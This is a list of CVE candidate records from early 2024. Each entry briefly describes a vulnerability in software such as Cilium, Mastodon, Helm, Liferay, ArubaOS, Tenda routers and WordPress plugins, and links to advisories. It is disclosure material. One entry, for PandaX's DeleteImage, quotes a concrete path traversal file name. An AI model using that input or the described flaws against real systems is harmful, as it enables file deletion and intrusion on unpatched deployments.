CVE    2024    25630    Candidate    Cilium is a networking, observability, and security solution with an eBPF-based dataplane. For Cilium users who are using CRDs to store Cilium state (the default configuration) and Wireguard transparent encryption, traffic to/from the Ingress and health endpoints is not encrypted. This issue affects Cilium v1.14 before v1.14.7 and has been patched in Cilium v1.14.7. There is no workaround to this issue.    MISC:https://docs.cilium.io/en/stable/security/network/encryption-wireguard/#encryption-wg   |   URL:https://docs.cilium.io/en/stable/security/network/encryption-wireguard/#encryption-wg   |   MISC:https://github.com/cilium/cilium/releases/tag/v1.14.7   |   URL:https://github.com/cilium/cilium/releases/tag/v1.14.7   |   MISC:https://github.com/cilium/cilium/security/advisories/GHSA-7496-fgv9-xw82   |   URL:https://github.com/cilium/cilium/security/advisories/GHSA-7496-fgv9-xw82    Assigned (20240208)
CVE    2024    2563    Candidate    A vulnerability has been found in PandaXGO PandaX up to 20240310 and classified as critical. This vulnerability affects the function DeleteImage of the file /apps/system/router/upload.go. The manipulation of the argument fileName with the input ../../../../../../../../../tmp/1.txt leads to path traversal: '../filedir'. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-257062 is the identifier assigned to this vulnerability.    MISC:VDB-257062 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257062   |   MISC:VDB-257062 | PandaXGO PandaX upload.go DeleteImage path traversal   |   URL:https://vuldb.com/?id.257062   |   MISC:https://github.com/PandaXGO/PandaX/pull/3   |   URL:https://github.com/PandaXGO/PandaX/pull/3    Assigned (20240316)
CVE    2024    25629    Candidate    c-ares is a C library for asynchronous DNS requests. `ares__read_line()` is used to parse local configuration files such as `/etc/resolv.conf`, `/etc/nsswitch.conf`, the `HOSTALIASES` file, and if using a c-ares version prior to 1.27.0, the `/etc/hosts` file. If any of these configuration files has an embedded `NULL` character as the first character in a new line, it can lead to attempting to read memory prior to the start of the given buffer which may result in a crash. This issue is fixed in c-ares 1.27.0. No known workarounds exist.    MISC:https://github.com/c-ares/c-ares/commit/a804c04ddc8245fc8adf0e92368709639125e183   |   URL:https://github.com/c-ares/c-ares/commit/a804c04ddc8245fc8adf0e92368709639125e183   |   MISC:https://github.com/c-ares/c-ares/security/advisories/GHSA-mg26-v6qh-x48q   |   URL:https://github.com/c-ares/c-ares/security/advisories/GHSA-mg26-v6qh-x48q    Assigned (20240208)
CVE    2024    25628    Candidate    Alf.io is a free and open source event attendance management system. In versions prior to 2.0-M4-2402 users can access the admin area even after being invalidated/deleted. This issue has been addressed in version 2.0-M4-2402. All users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/alfio-event/alf.io/security/advisories/GHSA-8p6m-mm22-q893   |   URL:https://github.com/alfio-event/alf.io/security/advisories/GHSA-8p6m-mm22-q893    Assigned (20240208)
CVE    2024    25627    Candidate    Alf.io is a free and open source event attendance management system. An administrator on the alf.io application is able to upload HTML files that trigger JavaScript payloads. As such, an attacker gaining administrative access to the alf.io application may be able to persist access by planting an XSS payload. This issue has been addressed in version 2.0-M4-2402. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/alfio-event/alf.io/security/advisories/GHSA-gpmg-8f92-37cf   |   URL:https://github.com/alfio-event/alf.io/security/advisories/GHSA-gpmg-8f92-37cf    Assigned (20240208)
CVE    2024    25626    Candidate    Yocto Project is an open source collaboration project that helps developers create custom Linux-based systems regardless of the hardware architecture. In Yocto Project's Bitbake before 2.6.2 (before and including Yocto Project 4.3.1), with the Toaster server (included in bitbake) running, missing input validation allows an attacker to perform remote code execution in the server's shell via a crafted HTTP request. Authentication is not necessary. Toaster server execution has to be specifically run and is not the default for Bitbake command line builds; it is only used for the Toaster web based user interface to Bitbake. The fix has been backported to the bitbake included with Yocto Project 5.0, 3.1.31, 4.0.16, and 4.3.2.    MISC:https://github.com/yoctoproject/poky/security/advisories/GHSA-75xw-78mm-72r4   |   URL:https://github.com/yoctoproject/poky/security/advisories/GHSA-75xw-78mm-72r4    Assigned (20240208)
CVE    2024    25625    Candidate    Pimcore's Admin Classic Bundle provides a Backend UI for Pimcore. A potential security vulnerability has been discovered in `pimcore/admin-ui-classic-bundle` prior to version 1.3.4. The vulnerability involves a Host Header Injection in the `invitationLinkAction` function of the UserController, specifically in the way `$loginUrl` trusts user input. The host header from incoming HTTP requests is used unsafely when generating URLs. An attacker can manipulate the HTTP host header in requests to the /admin/user/invitationlink endpoint, resulting in the generation of URLs with the attacker's domain. In fact, if a host header is injected in the POST request, the $loginURL parameter is constructed with this unvalidated host header. It is then used to send an invitation email to the provided user. This vulnerability can be used to perform phishing attacks by making the URLs in the invitation links emails point to an attacker-controlled domain. Version 1.3.4 contains a patch for the vulnerability. The maintainers recommend validating the host header and ensuring it matches the application's domain. It would also be beneficial to use a default trusted host or hostname if the incoming host header is not recognized or is absent.    MISC:https://github.com/pimcore/admin-ui-classic-bundle/commit/b9fee9d383fc73dbd5e1d98dbb0ff3266d6b5a82   |   URL:https://github.com/pimcore/admin-ui-classic-bundle/commit/b9fee9d383fc73dbd5e1d98dbb0ff3266d6b5a82   |   MISC:https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-3qpq-6w89-f7mx   |   URL:https://github.com/pimcore/admin-ui-classic-bundle/security/advisories/GHSA-3qpq-6w89-f7mx    Assigned (20240208)
CVE    2024    25623    Candidate    Mastodon is a free, open-source social network server based on ActivityPub. Prior to versions 4.2.7, 4.1.15, 4.0.15, and 3.5.19, when fetching remote statuses, Mastodon doesn't check that the response from the remote server has a `Content-Type` header value of the Activity Streams media type, which allows a threat actor to upload a crafted Activity Streams document to a remote server and make a Mastodon server fetch it, if the remote server accepts arbitrary user uploads. The vulnerability allows a threat actor to impersonate an account on a remote server that satisfies all of the following properties: allows the attacker to register an account; accepts arbitrary user-uploaded documents and places them on the same domain as the ActivityPub actors; and serves user-uploaded documents in response to requests with an `Accept` header value of the Activity Streams media type. Versions 4.2.7, 4.1.15, 4.0.15, and 3.5.19 contain a fix for this issue.    MISC:https://github.com/mastodon/mastodon/commit/9fee5e852669e26f970e278021302e1a203fc022   |   URL:https://github.com/mastodon/mastodon/commit/9fee5e852669e26f970e278021302e1a203fc022   |   MISC:https://github.com/mastodon/mastodon/security/advisories/GHSA-jhrq-qvrm-qr36   |   URL:https://github.com/mastodon/mastodon/security/advisories/GHSA-jhrq-qvrm-qr36    Assigned (20240208)
CVE    2024    25620    Candidate    Helm is a tool for managing Charts. Charts are packages of pre-configured Kubernetes resources. When either the Helm client or SDK is used to save a chart whose name within the `Chart.yaml` file includes a relative path change, the chart would be saved outside its expected directory based on the changes in the relative path. The validation and linting did not detect the path changes in the name. This issue has been resolved in Helm v3.14.1. Users unable to upgrade should check all charts used by Helm for path changes in their name as found in the `Chart.yaml` file. This includes dependencies.    MISC:https://github.com/helm/helm/commit/0d0f91d1ce277b2c8766cdc4c7aa04dbafbf2503   |   URL:https://github.com/helm/helm/commit/0d0f91d1ce277b2c8766cdc4c7aa04dbafbf2503   |   MISC:https://github.com/helm/helm/security/advisories/GHSA-v53g-5gjp-272r   |   URL:https://github.com/helm/helm/security/advisories/GHSA-v53g-5gjp-272r    Assigned (20240208)
CVE    2024    2562    Candidate    A vulnerability, which was classified as critical, was found in PandaXGO PandaX up to 20240310. This affects the function InsertRole of the file /apps/system/services/role_menu.go. The manipulation of the argument roleKey leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257061 was assigned to this vulnerability.    MISC:VDB-257061 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257061   |   MISC:VDB-257061 | PandaXGO PandaX role_menu.go InsertRole sql injection   |   URL:https://vuldb.com/?id.257061   |   MISC:https://github.com/PandaXGO/PandaX/issues/4   |   URL:https://github.com/PandaXGO/PandaX/issues/4    Assigned (20240316)
CVE    2024    25619    Candidate    Mastodon is a free, open-source social network server based on ActivityPub. When an OAuth Application is destroyed, the streaming server wasn't being informed that the Access Tokens had also been destroyed; this could have posed security risks to users by allowing an application to continue listening to streaming after the application had been destroyed. Essentially this comes down to the fact that when Doorkeeper sets up the relationship between Applications and Access Tokens, it uses a `dependent: delete_all` configuration, which means the `after_commit` callback setup on `AccessTokenExtension` didn't actually fire, since `delete_all` doesn't trigger ActiveRecord callbacks. To mitigate, we need to add a `before_destroy` callback to `ApplicationExtension` which announces to streaming that all the Application's Access Tokens are being "killed". Impact should be negligible given the affected application had to be owned by the user. Nonetheless, this issue has been addressed in versions 4.2.6, 4.1.14, 4.0.14, and 3.5.18. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/mastodon/mastodon/commit/68eaa804c9bafdc5f798e114e9ba00161425dd71   |   URL:https://github.com/mastodon/mastodon/commit/68eaa804c9bafdc5f798e114e9ba00161425dd71   |   MISC:https://github.com/mastodon/mastodon/security/advisories/GHSA-7w3c-p9j8-mq3x   |   URL:https://github.com/mastodon/mastodon/security/advisories/GHSA-7w3c-p9j8-mq3x    Assigned (20240208)
CVE    2024    25618    Candidate    Mastodon is a free, open-source social network server based on ActivityPub. Mastodon allows new identities from configured authentication providers (CAS, SAML, OIDC) to attach to existing local users with the same e-mail address. This results in a possible account takeover if the authentication provider allows changing the e-mail address or multiple authentication providers are configured. When a user logs in through an external authentication provider for the first time, Mastodon checks the e-mail address passed by the provider to find an existing account. However, using the e-mail address alone means that if the authentication provider allows changing the e-mail address of an account, the Mastodon account can immediately be hijacked. All users logging in through external authentication providers are affected. The severity is medium, as it also requires the external authentication provider to misbehave. However, some well-known OIDC providers (like Microsoft Azure) make it very easy to accidentally allow unverified e-mail changes. Moreover, OpenID Connect also allows dynamic client registration. This issue has been addressed in versions 4.2.6, 4.1.14, 4.0.14, and 3.5.18. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/mastodon/mastodon/commit/b31af34c9716338e4a32a62cc812d1ca59e88d15   |   URL:https://github.com/mastodon/mastodon/commit/b31af34c9716338e4a32a62cc812d1ca59e88d15   |   MISC:https://github.com/mastodon/mastodon/security/advisories/GHSA-vm39-j3vx-pch3   |   URL:https://github.com/mastodon/mastodon/security/advisories/GHSA-vm39-j3vx-pch3    Assigned (20240208)
CVE    2024    25617    Candidate    Squid is an open source caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. Due to a Collapse of Data into Unsafe Value bug, Squid may be vulnerable to a Denial of Service attack against HTTP header parsing. This problem allows a remote client or a remote server to perform Denial of Service when sending oversized headers in HTTP messages. In versions of Squid prior to 6.5 this can be achieved if the request_header_max_size or reply_header_max_size settings are unchanged from the default. In Squid version 6.5 and later, the default setting of these parameters is safe. Squid will emit a critical warning in cache.log if the administrator is setting these parameters to unsafe values. Squid will not at this time prevent these settings from being changed to unsafe values. Users are advised to upgrade to version 6.5. There are no known workarounds for this vulnerability. This issue is also tracked as SQUID-2024:2.    CONFIRM:https://security.netapp.com/advisory/ntap-20240322-0006/   |   MISC:https://github.com/squid-cache/squid/commit/72a3bbd5e431597c3fdb56d752bc56b010ba3817   |   URL:https://github.com/squid-cache/squid/commit/72a3bbd5e431597c3fdb56d752bc56b010ba3817   |   MISC:https://github.com/squid-cache/squid/security/advisories/GHSA-h5x6-w8mv-xfpr   |   URL:https://github.com/squid-cache/squid/security/advisories/GHSA-h5x6-w8mv-xfpr    Assigned (20240208)
CVE    2024    25616    Candidate    Aruba has identified certain configurations of ArubaOS that can lead to partial disclosure of sensitive information in the IKE_AUTH negotiation process. The scenarios in which disclosure of potentially sensitive information can occur are complex, and depend on factors beyond the control of attackers.    MISC:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-002.txt   |   URL:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-002.txt    Assigned (20240208)
CVE    2024    25615    Candidate    An unauthenticated Denial-of-Service (DoS) vulnerability exists in the Spectrum service accessed via the PAPI protocol in ArubaOS 8.x. Successful exploitation of this vulnerability results in the ability to interrupt the normal operation of the affected service.    MISC:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-002.txt   |   URL:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-002.txt    Assigned (20240208)
CVE    2024    25614    Candidate    There is an arbitrary file deletion vulnerability in the CLI used by ArubaOS. Successful exploitation of this vulnerability results in the ability to delete arbitrary files on the underlying operating system, which could lead to denial-of-service conditions and impact the integrity of the controller.    MISC:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-002.txt   |   URL:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-002.txt    Assigned (20240208)
CVE    2024    25613    Candidate    Authenticated command injection vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities results in the ability to execute arbitrary commands as a privileged user on the underlying operating system.    MISC:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-002.txt   |   URL:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-002.txt    Assigned (20240208)
CVE    2024    25610    Candidate    In Liferay Portal 7.2.0 through 7.4.3.12, and older unsupported versions, and Liferay DXP 7.4 before update 9, 7.3 before update 4, 7.2 before fix pack 19, and older unsupported versions, the default configuration does not sanitize blog entries of JavaScript, which allows remote authenticated users to inject arbitrary web script or HTML (XSS) via a crafted payload injected into a blog entry’s content text field.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25610   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25610    Assigned (20240208)
CVE    2024    2561    Candidate    A vulnerability, which was classified as critical, has been found in 74CMS 3.28.0. Affected by this issue is the function sendCompanyLogo of the file /controller/company/Index.php#sendCompanyLogo of the component Company Logo Handler. The manipulation of the argument imgBase64 leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257060.    MISC:VDB-257060 | 74CMS Company Logo Index.php#sendCompanyLogo unrestricted upload   |   URL:https://vuldb.com/?id.257060   |   MISC:VDB-257060 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257060   |   MISC:https://gist.github.com/Southseast/9f5284d8ee0f6d91e72eef73b285512a   |   URL:https://gist.github.com/Southseast/9f5284d8ee0f6d91e72eef73b285512a    Assigned (20240316)
CVE    2024    25609    Candidate    HtmlUtil.escapeRedirect in Liferay Portal 7.2.0 through 7.4.3.12, and older unsupported versions, and Liferay DXP 7.4 before update 9, 7.3 service pack 3, 7.2 fix pack 15 through 18, and older unsupported versions can be circumvented by using two forward slashes, which allows remote attackers to redirect users to arbitrary external URLs via the (1) `redirect` parameter, (2) `FORWARD_URL` parameter, and (3) other parameters that rely on HtmlUtil.escapeRedirect. This vulnerability is the result of an incomplete fix in CVE-2022-28977.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25609   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25609    Assigned (20240208)
CVE    2024    25608    Candidate    HtmlUtil.escapeRedirect in Liferay Portal 7.2.0 through 7.4.3.18, and older unsupported versions, and Liferay DXP 7.4 before update 19, 7.3 before update 4, 7.2 before fix pack 19, and older unsupported versions can be circumvented by using the 'REPLACEMENT CHARACTER' (U+FFFD), which allows remote attackers to redirect users to arbitrary external URLs via the (1) `redirect` parameter, (2) `FORWARD_URL` parameter, (3) `noSuchEntryRedirect` parameter, and (4) other parameters that rely on HtmlUtil.escapeRedirect.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25608   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25608    Assigned (20240208)
CVE    2024    25607    Candidate    The default password hashing algorithm (PBKDF2-HMAC-SHA1) in Liferay Portal 7.2.0 through 7.4.3.15, and older unsupported versions, and Liferay DXP 7.4 before update 16, 7.3 before update 4, 7.2 before fix pack 17, and older unsupported versions defaults to a low work factor, which allows attackers to quickly crack password hashes.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25607   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25607    Assigned (20240208)
CVE    2024    25606    Candidate    XXE vulnerability in Liferay Portal 7.2.0 through 7.4.3.7, and older unsupported versions, and Liferay DXP 7.4 before update 4, 7.3 before update 12, 7.2 before fix pack 20, and older unsupported versions allows attackers with permission to deploy widgets/portlets/extensions to obtain sensitive information or consume system resources via the Java2WsddTask._format method.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25606   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25606    Assigned (20240208)
CVE    2024    25605    Candidate    The Journal module in Liferay Portal 7.2.0 through 7.4.3.4, and older unsupported versions, and Liferay DXP 7.4.13, 7.3 before service pack 3, 7.2 before fix pack 17, and older unsupported versions grants guest users view permission to web content templates by default, which allows remote attackers to view any template via the UI or API.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25605   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25605    Assigned (20240208)
CVE    2024    25604    Candidate    Liferay Portal 7.2.0 through 7.4.3.4, and older unsupported versions, and Liferay DXP 7.4.13, 7.3 before service pack 3, 7.2 before fix pack 17, and older unsupported versions does not properly check user permissions, which allows remote authenticated users with the VIEW user permission to edit their own permission via the User and Organizations section of the Control Panel.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25604   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25604    Assigned (20240208)
CVE    2024    25603    Candidate    Stored cross-site scripting (XSS) vulnerability in the Dynamic Data Mapping module's DDMForm in Liferay Portal 7.2.0 through 7.4.3.4, and older unsupported versions, and Liferay DXP 7.4.13, 7.3 before update 4, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML via the instanceId parameter.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25603   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25603    Assigned (20240208)
CVE    2024    25602    Candidate    Stored cross-site scripting (XSS) vulnerability in Users Admin module's edit user page in Liferay Portal 7.2.0 through 7.4.2, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML via a crafted payload injected into an organization’s “Name” text field.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25602   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25602    Assigned (20240208)
CVE    2024    25601    Candidate    Stored cross-site scripting (XSS) vulnerability in Expando module's geolocation custom fields in Liferay Portal 7.2.0 through 7.4.2, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML via a crafted payload injected into the name text field of a geolocation custom field.    MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25601   |   URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25601    Assigned (20240208)
CVE    2024    2560    Candidate    A vulnerability classified as problematic was found in Tenda AC18 15.03.05.05. Affected by this vulnerability is the function fromSysToolRestoreSet of the file /goform/SysToolRestoreSet. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257059. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257059 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257059   |   MISC:VDB-257059 | Tenda AC18 SysToolRestoreSet fromSysToolRestoreSet cross-site request forgery   |   URL:https://vuldb.com/?id.257059   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/fromSysToolRestoreSet.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/fromSysToolRestoreSet.md    Assigned (20240316)
CVE    2024    25598    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Livemesh Livemesh Addons for Elementor allows Stored XSS. This issue affects Livemesh Addons for Elementor: from n/a through 8.3.    MISC:https://patchstack.com/database/vulnerability/addons-for-elementor/wordpress-elementor-addons-by-livemesh-plugin-8-3-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/addons-for-elementor/wordpress-elementor-addons-by-livemesh-plugin-8-3-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240208)
CVE    2024    25597    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Etoile Web Design Ultimate Reviews allows Stored XSS. This issue affects Ultimate Reviews: from n/a through 3.2.8.    MISC:https://patchstack.com/database/vulnerability/ultimate-reviews/wordpress-ultimate-reviews-plugin-3-2-8-unauthenticated-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/ultimate-reviews/wordpress-ultimate-reviews-plugin-3-2-8-unauthenticated-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240208)
CVE    2024    25596    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Doofinder Doofinder for WooCommerce allows Stored XSS. This issue affects Doofinder for WooCommerce: from n/a through 2.1.8.    MISC:https://patchstack.com/database/vulnerability/doofinder-for-woocommerce/wordpress-doofinder-for-woocommerce-plugin-2-1-8-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/doofinder-for-woocommerce/wordpress-doofinder-for-woocommerce-plugin-2-1-8-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240208)
CVE    2024    25594    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Savvy WordPress Development MyWaze allows Stored XSS. This issue affects MyWaze: from n/a through 1.6.    MISC:https://patchstack.com/database/vulnerability/my-waze/wordpress-mywaze-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/my-waze/wordpress-mywaze-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240208)
CVE    2024    25593    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Basix NEX-Forms – Ultimate Form Builder allows Stored XSS. This issue affects NEX-Forms – Ultimate Form Builder: from n/a through 8.5.5.    MISC:https://patchstack.com/database/vulnerability/nex-forms-express-wp-form-builder/wordpress-nex-forms-plugin-8-5-5-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/nex-forms-express-wp-form-builder/wordpress-nex-forms-plugin-8-5-5-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240208)
CVE    2024    25592    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPMU DEV Broken Link Checker allows Stored XSS. This issue affects Broken Link Checker: from n/a through 2.2.3.    MISC:https://patchstack.com/database/vulnerability/broken-link-checker/wordpress-broken-link-checker-plugin-2-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/broken-link-checker/wordpress-broken-link-checker-plugin-2-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240208)
CVE    2024    25591    Candidate    Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Benjamin Rojas WP Editor. This issue affects WP Editor: from n/a through 1.2.7.    MISC:https://patchstack.com/database/vulnerability/wp-editor/wordpress-wp-editor-plugin-1-2-7-sensitive-data-exposure-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-editor/wordpress-wp-editor-plugin-1-2-7-sensitive-data-exposure-vulnerability?_s_id=cve    Assigned (20240208)
CVE    2024    2559    Candidate    A vulnerability classified as problematic has been found in Tenda AC18 15.03.05.05. Affected is the function fromSysToolReboot of the file /goform/SysToolReboot. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257058 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257058 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257058   |   MISC:VDB-257058 | Tenda AC18 SysToolReboot fromSysToolReboot cross-site request forgery   |   URL:https://vuldb.com/?id.257058   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/fromSysToolReboot.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/fromSysToolReboot.md    Assigned (20240316)
CVE    2024    2558    Candidate    A vulnerability was found in Tenda AC18 15.03.05.05. It has been rated as critical. This issue affects the function formexeCommand of the file /goform/execCommand. The manipulation of the argument cmdinput leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257057 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257057 | CTI Indicators (IOB, IOC, IOA)   |   URL:https://vuldb.com/?ctiid.257057   |   MISC:VDB-257057 | Tenda AC18 execCommand formexeCommand stack-based overflow   |   URL:https://vuldb.com/?id.257057   |   MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formexeCommand.md   |   URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formexeCommand.md    Assigned (20240316)
CVE    2024    25579    Candidate    OS command injection vulnerability in ELECOM wireless LAN routers allows a network-adjacent attacker with an administrative privilege to execute arbitrary OS commands by sending a specially crafted request to the product. Affected products and versions are as follows: WRC-1167GS2-B v1.67 and earlier, WRC-1167GS2H-B v1.67 and earlier, WRC-2533GS2-B v1.62 and earlier, WRC-2533GS2-W v1.62 and earlier, and WRC-2533GS2V-B v1.62 and earlier.    MISC:https://jvn.jp/en/vu/JVNVU99444194/   |   URL:https://jvn.jp/en/vu/JVNVU99444194/   |   MISC:https://www.elecom.co.jp/news/security/20240220-01/   |   URL:https://www.elecom.co.jp/news/security/20240220-01/    Assigned (20240215)
CVE    2024    25578    Candidate    MicroDicom DICOM Viewer versions 2023.3 (Build 9342) and prior contain a lack of proper validation of user-supplied data, which could result in memory corruption within the application.    MISC:https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-060-01   |   URL:https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-060-01    Assigned (20240212)
CVE    2024    2557    Candidate    A vulnerability was found in kishor-23 Food Waste Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/admin.php. The manipulation leads to improper authorization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257056. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:VDB-257056 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257056   |   MISC:VDB-257056 | kishor-23 Food Waste Management System admin.php improper authorization   |   URL:https://vuldb.com/?id.257056   |   MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/Execute%20After%20Redirect%20-%20Food%20Management%20System.md   |   URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/Execute%20After%20Redirect%20-%20Food%20Management%20System.md    Assigned (20240316)
CVE    2024    25567    Candidate    A path traversal attack is possible that can write outside of the intended directory and may access sensitive information. If a file name is specified that already exists on the file system, then the original file will be overwritten.    MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12    Assigned (20240312)
CVE    2024    2556    Candidate    A vulnerability was found in SourceCodester Employee Task Management System 1.0. It has been classified as critical. This affects an unknown part of the file attendance-info.php. The manipulation of the argument user_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257055.    MISC:VDB-257055 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257055   |   MISC:VDB-257055 | SourceCodester Employee Task Management System attendance-info.php sql injection   |   URL:https://vuldb.com/?id.257055   |   MISC:https://github.com/tht1997/WhiteBox/blob/main/sourcecodesters/employee-management-system-php-attendance-info.md   |   URL:https://github.com/tht1997/WhiteBox/blob/main/sourcecodesters/employee-management-system-php-attendance-info.md    Assigned (20240316)
CVE    2024    25559    Candidate    URL spoofing vulnerability exists in a-blog cms Ver.3.1.0 to Ver.3.1.8. If an attacker sends a specially crafted request, the administrator of the product may be forced to access an arbitrary website when clicking a link in the audit log.    MISC:https://developer.a-blogcms.jp/blog/news/JVN-48966481.html   |   URL:https://developer.a-blogcms.jp/blog/news/JVN-48966481.html   |   MISC:https://jvn.jp/en/jp/JVN48966481/   |   URL:https://jvn.jp/en/jp/JVN48966481/    Assigned (20240208)
CVE    2024    25552    Candidate    A local attacker can gain administrative privileges by inserting an executable file in the path of the affected product.    MISC:https://cert.vde.com/en/advisories/VDE-2024-018   |   URL:https://cert.vde.com/en/advisories/VDE-2024-018    Assigned (20240207)
CVE    2024    25551    Candidate    Cross Site Scripting (XSS) vulnerability in sourcecodester Simple Student Attendance System v1.0 allows attackers to execute arbitrary code via crafted GET request to web application URL.    MISC:https://medium.com/@jose.inaciot/my-first-cve-cve-2024-25551-f91787c05ae9    Assigned (20240207)
